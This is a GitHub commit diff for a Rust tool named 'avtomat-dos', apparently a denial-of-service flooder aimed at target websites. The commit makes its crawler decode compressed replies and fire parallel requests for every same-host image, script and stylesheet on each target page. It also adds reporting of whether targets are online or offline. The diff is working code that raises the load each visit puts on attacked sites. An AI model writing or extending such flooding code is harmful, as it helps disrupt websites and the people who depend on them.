Skip to content

Commit

Permalink
handle encoded replies, request scripts and css
Browse files Browse the repository at this point in the history
  • Loading branch information
Grrwahrr committed Apr 15, 2022
1 parent 79f9184 commit ed293de
Show file tree
Hide file tree
Showing 4 changed files with 47 additions and 10 deletions.
4 changes: 2 additions & 2 deletions Cargo.toml
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
[package]
name = "avtomat-dos"
version = "1.0.0"
version = "1.0.2"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
Expand All @@ -11,7 +11,7 @@ ed25519-dalek = "1.0.1"
futures = "0.3.21"
iced = { version = "0.3.0", features = ["tokio"] }
rand = "0.8.5"
reqwest = { version = "0.11", features = ["cookies"] }
reqwest = { version = "0.11", features = ["cookies", "gzip", "brotli"] }
select = "0.5.0"
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
Expand Down
8 changes: 5 additions & 3 deletions build.rs
Original file line number Diff line number Diff line change
@@ -1,12 +1,14 @@
use std::io;
#[cfg(windows)] use winres::WindowsResource;
#[cfg(windows)]
use winres::WindowsResource;

fn main() -> io::Result<()> {
#[cfg(windows)] {
#[cfg(windows)]
{
WindowsResource::new()
// This path can be absolute, or relative to your crate root.
.set_icon("assets/app.ico")
.compile()?;
}
Ok(())
}
}
34 changes: 29 additions & 5 deletions src/crawler/mod.rs
Original file line number Diff line number Diff line change
Expand Up @@ -213,7 +213,7 @@ fn crawler_process_task_report(
state,
requests_send,
} => {
println!("TaskFinished: {target:?} {requests_send}");
println!("TaskFinished: {target:?} {state} {requests_send}");

// Reduce the number of active tasks
*active_tasks -= 1;
Expand Down Expand Up @@ -329,6 +329,8 @@ async fn crawler_crawl_website(url: String, headers: Headers) -> Option<(u32, Ta
let client = reqwest::ClientBuilder::new()
.cookie_store(true)
.user_agent(headers.agent)
.gzip(true)
.brotli(true)
.default_headers(header_map)
.tcp_keepalive(Duration::from_secs(5))
.timeout(Duration::from_secs(30))
Expand All @@ -350,17 +352,39 @@ async fn crawler_crawl_website(url: String, headers: Headers) -> Option<(u32, Ta
let html = res.text().await.unwrap_or_default();

// Try to find pictures on the same host, build a get request for each
let image_requests: Vec<Request> = Document::from(html.as_str())
let mut requests_images: Vec<Request> = Document::from(html.as_str())
.find(Name("img"))
.filter_map(|node| node.attr("src"))
.filter(|src| src.contains(&host) || !src.contains("://"))
.filter_map(|img| client.get(img).build().ok())
.collect();

// Try to find script files on the same host
let mut requests_scripts: Vec<Request> = Document::from(html.as_str())
.find(Name("script"))
.filter_map(|node| node.attr("src"))
.filter(|src| src.contains(&host) || !src.contains("://"))
.filter_map(|script| client.get(script).build().ok())
.collect();

// Try to find linked files on the same host (.css, .ico, .png)
let mut requests_links: Vec<Request> = Document::from(html.as_str())
.find(Name("link"))
.filter_map(|node| node.attr("href"))
.filter(|src| {
(src.contains(&host) || !src.contains("://"))
&& (src.contains(".css") || src.contains(".ico") || src.contains(".png"))
})
.filter_map(|script| client.get(script).build().ok())
.collect();

let mut requests = Vec::new();
requests.append(&mut requests_images);
requests.append(&mut requests_scripts);
requests.append(&mut requests_links);

// Create a bunch of futures to fetch the collected images, scripts and linked files
let futures = image_requests
.into_iter()
.map(|img_req| client.execute(img_req));
let futures = requests.into_iter().map(|img_req| client.execute(img_req));

// Send requests and wait for all responses
let responses = futures::future::join_all(futures).await;
Expand Down
11 changes: 11 additions & 0 deletions src/crawler/target_picker.rs
Original file line number Diff line number Diff line change
@@ -1,5 +1,6 @@
use crate::targets::{hash_target, Target};
use std::collections::HashMap;
use std::fmt;
use std::ops::Add;
use std::time::{Duration, SystemTime};

Expand All @@ -11,6 +12,16 @@ pub enum TargetState {
Offline,
}

impl fmt::Display for TargetState {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
TargetState::Unknown => write!(f, "Unknown"),
TargetState::Online => write!(f, "Online"),
TargetState::Offline => write!(f, "Offline"),
}
}
}

/// Info about the target, whether it is online and when we can next send requests
struct TargetInfo {
target: Target,
Expand Down

0 comments on commit ed293de

Please sign in to comment.